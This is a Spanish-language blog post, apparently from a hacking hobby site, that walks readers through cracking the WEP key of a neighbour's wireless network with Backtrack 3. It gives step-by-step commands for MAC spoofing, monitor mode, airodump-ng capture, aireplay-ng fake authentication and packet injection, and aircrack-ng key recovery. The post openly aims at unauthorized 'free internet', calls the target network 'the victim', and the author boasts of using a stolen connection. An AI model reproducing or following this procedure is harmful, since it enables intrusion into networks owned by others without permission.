Hemos notado la necesidad de los visitantes por pedir ayuda, recueden que en lo comentarios no se proporciona ningun email o de lo contario no se publicará, por favor usen el contacto directo.

 

Tu resolución de pantalla es de

-->

IP

Backtrack 3, hacking wireless WEP en minutos y fácil de entender (Hackear una red inalambrica)

Hola, ¿como estas?, ¿ya estas listo para tener internet gratis? XD Para empezar debes saber los recursos que voy utilizar para la demostración en esta oportunidad:

1. Una targeta inalambrica TP-LINK 24Mbps PCI / TL-WN551G con chip atheros, la cual vas a tu tienda de computadoras o donde vendan accesorios y preguntas por una de ellas, cada ves estan mas baratas =) Pues te tengo una imágen para que te guies mejor de que targeta estoy hablando y para que no te pierdas ok... (Fig. 1)


Fig. 1: Targeta TP-LINK 24Mbps PCI / TL-WN551G









2. Tener el Programa Backtrack 3 -pues debes saber que mas q un simple programa es una sistema operativo modificado bajo los dominios de LINUX, ese es otro cantar jeje... ahora sigamos con los nuestro- pues este lo puedes descargar desde es link por ejemplo: http://www.remote-exploit.org/backtrack_download.html (OJO, descarga el que dice, Description: CD Image Name: bt3-final.iso y lo quemas en un CD, para mayor seguridad mira la imagen XD, Fig. 2) , aunq tambien pues descargar el Description: USB Version (Extended) eso es cuestion de gustos XD! o en todo caso puesdes poner en el buscador de google "descargar Backtrack 3" (sin las comillas) y te sale otros link de descargas :)



Fig. 2: Description: CD Image Name: bt3-final.iso





Listo!! hasta ahi son los recursos principales, oviamente adicionalmente se requiere una computadora y Internet px ;)

PASOS PARA EMPEZAR CON EL WEP HACKING...

1. Ingresa en CD del Backtrack 3 en tu lectora a tu PC y/o Laptop y reinicia tu pc y esperas que carge todo por defecto y al finalizar vas a ver esa imagen en tu pc, Fig. 3

Fig. 3: Es el simbolo que veras cuando carga el famoso Backtrack 3.





2. Una ves que ya llegaste hasta ahi, desde aqui empieza lo divertido XD! Ahora quiero q mires la imagen siguiente, Fig. 4 y le das clic al cuadradito negrito y se habre algo cierto?? pues eso es una consola o terminal, ahi es donde ingresaremos todo nuestro código.

Fig. 4: Detallando de donde se abre la consola de linux, desde el cuadrado negro, solo dale clic.

3. Una ves abierto la consola, por seguridad, cabiamos la MAC de nuestra targeta de red escribiendo el siguiente comando (y luego de das ENTER oviamente XD!):
macchanger - m 00:11:22:33:44:55 wifi0

4. Luego de ello, si vamos directo al grano, es decir ponemos nuestra targeta en modo monitor, es decir para ver que redes pasan por casualidad por nuestra PC, con el siguiente comando:
airmon-ng start wifi0 Y acontinuacion escribes los siguiente: airodump-ng ath1 y obtendras una pantalla similar a esta imagen, fig. 5

Fig. 5: Es lo que observas luego de haber ingresado consecutivamente los siguientes comandos:
airmon-ng start wifi0
airodump-ng ath1

5. Ahora elegimos a la victima, jeje upps! XD, digo a la red que quieres sacar la clave px, pero ten en cuenta que en la columna de nombre ENC y CIPHER tiene que decir WEB, porq si dice otra cosa, por ejemplo, WPA2 y TKIP pues no funcionara, esa es otra forma de seguridad que luego haré otro tutorial para ello OK. mira la imagen de gia, fig. 6

Fig. 6: En mi caso estoy eligiendo la red que ves marcada con linea punteada.
Obs: Anda mirando los nombres de cada columna ya que dichos nombres lo vas usar mas adelate :)


6. Luego que has elegido tu red, vas a escribir lo siguiente en la consola:
airodump-ng -c [channel] --bssid [AP MAC] -w [filename] ath1 Obiamente sin corchetes, para mi caso seria como la imagen siguiente, fig. 7

Fig. 7: Muestro la red que he elegido, para mi caso, mostrando el comando con sus respectivos parametros, espero que con esta imagen salgas de alguna duda XD!


7. Luego que das enter al comando anterior(como gia fig. 7) te sale la siguiente imagen, ver fig. 8

Fig. 8: Mostrando imágen luego de haber ingresado el comando: airodump-ng -c [channel] --bssid [AP MAC] -w [filename] ath1 oviamente con mis datos de mi red.

8. Hasta ahi ya tamos cerca de nuestra clave, ya casi la podemos rozarla jeje.. ya falta poco, bueno seguimos. Ahora esa consola dejala ahi y procedes abrir otra, ya saves de donde sacarla ¿cierto? o ¿no? :o En seguida ingresa el siguiente comando, oviamente en la nueva consola o terminal:
aireplay-ng --fakeauth 0 -e [AP SSID] -a [AP MAC] ath1
donde:
[AP SSID] es el nombre de la red: Por ejemplo MIWLAN o lo que salga en la red que eligiste, ahi en la primera consola, para mi caso dice: axel y luego le das enter y debes obtener algo como esta imagen, fig. 9

Fig. 9: En dicha imagen muestro el resultado luego de haber ingresado: aireplay-ng --fakeauth 0 -e [AP SSID] -a [AP MAC] ath1 aplicado a la red que elegí px. Y si te sale todo este mensaje a ti tambien pues FELICIDADES, ya casi la tenemos...
NOTA: Esto nos permitira provocar el flujo para obtener los paquetes necesarios...

9. Ahora si empesamos a inyectar, es decir a provocar el flujo, pone el siguiente comando:
aireplay-ng -3 -b [AP MAC] ath1 -x 250 y luego de un par de minutos aproximadamente o antes empezaras a ver como en la consola dos empiesan a obtenerse los packets, pero eso va acompañado con el cambio que tambien observaras en la consola o terminal primera, exactamente en la columna de #Data (aqui los datos empiezan a subir), para que no te pierdas, como siempre adjunto una imagen, fig. 10

Fig. 10: Muestro las dos consolas que tu tambien debes de tener, y observa la primera y segunda consola, asi como ya describí..
Te voy adelantando que en la primera consola, en la columna #Data debemos de tener como minimo 10000 para empezar a decifrar la clave... en mi caso recien voy por 3 jeje esq recien esta obteniendo los datos px XD



10. Uff! ya falta muy poco :) ahora... mmmm me olvide que sigue jajaja.. jeeje mentira, como crees que te voy a dejar en la mejor parte XD.
Una ves que obtengas en la columna #Data de la primera consola, unos 10000 (diez mil) entonces abrimos una tercera consola y en ella escribimos lo siguiente:
aircrack-ng file-01.cap (recuerda que file es el nombre que pusiste en el paso 6, bueno para mi caso, tu pon el nombre que pusiste px) y si ello es sufieciente entonces obtendras tu clave, asi como muestra la siguiente imagen, fig 11 caso que no lo logre aun, tienes que esperar que siga obteniendo mas datos pz... en micaso solo necesite de 38430 datos en la columna #Data poco verdad XD.

Fig. 11: Mostrando imágen luego de haber ingresado el comando, en la tercera consola, es decir: aircrack-ng file-01.cap Y como verás ya obtuve mi clave!!!!!! :D :D :D
Obs: Lo que vale es la parte donde esta asi:
[ASCII: 43210] osea la clave de red es 43210, que facil nu y tanto esfuerzo para que le pongas una clave tan facil jiji..


Obs. Algunas veces ponen claves dificiles y no te muestra el convertido a ascii, entonces lo que tienes que hacer es copiar lo siguiente, para mi caso: [34:33:32:31:30], y te alquinas un toke internet y abres un navegador, de preferencia Moxilla y entras a google y escribes que busque lo siguiente "convertir de hexadecimal a ascii", ya saves, sin comillas. Para simplificarte el trabajo, entra a este link: http://hwagm.elhacker.net/php/sneak.php y en el cuadro ingresas lo que te dije que copies, pero ahi lo colocas sin los dos puntos, y luego eliges Hex to ASCII, para que no te pierdas mira esta imagen, fig. 12
Fig. 12: Es la manera correcta que debes ingresar y luego que tienes ello, le das clic en Ejecutar codificación y listo !! XD





Y luego que le das clic en 'Ejecutar codificación' ya tienes tu clave traducida, en mi caso sería asi, fig. 13 y Luego reinicias tu PC, entras a tu sistema Operativo favorito y buscas la red que sacaste la clave y cuando te pida la clave, solo la ingresas y listo!.

Fig. 13: En la parte Inferior se muestra la conversion de tu clave...
Puedes ingresarla a tu red o copiarla y pegarla cuando tu red te pida la clave respectiva.




Hemos finalizado... Ufff! que trabajo q fue hacer todo este tuto jejeje... espero que valga la pena y que te haya ayudad en algo y tambien tengas internet gratuito haci como yo jeje.. A te cuento, este tuto lo estoy haciendo justamente con mi red gratis jiji..

Saludos y si tienes dudas no dudes en hacermelas... Y pronto haré otro tuto para el otro tipo de seguridad de redes, me refiero al tipo TKIP y otras.. Suerte con tu red :)

2 Deja tu Opinion o Seras Taringuero:

▼▲ Mostrar / Ocultar comentarios

Publicar un comentario

Usa los emoticones copiando y pegando sus respectivos codigos.
Los comentarios que contengan insultos u ofensan no son publicados.
Para preguntas o ayudas utilza la seccion Contacto

:a   :b   :c   :d   :e   :f   :g   :h   :i   :j   :k   :l   :m   :n   :o   :p   :q   :r   :s   :t

Related Posts with Thumbnails

Quejas o Sugerencias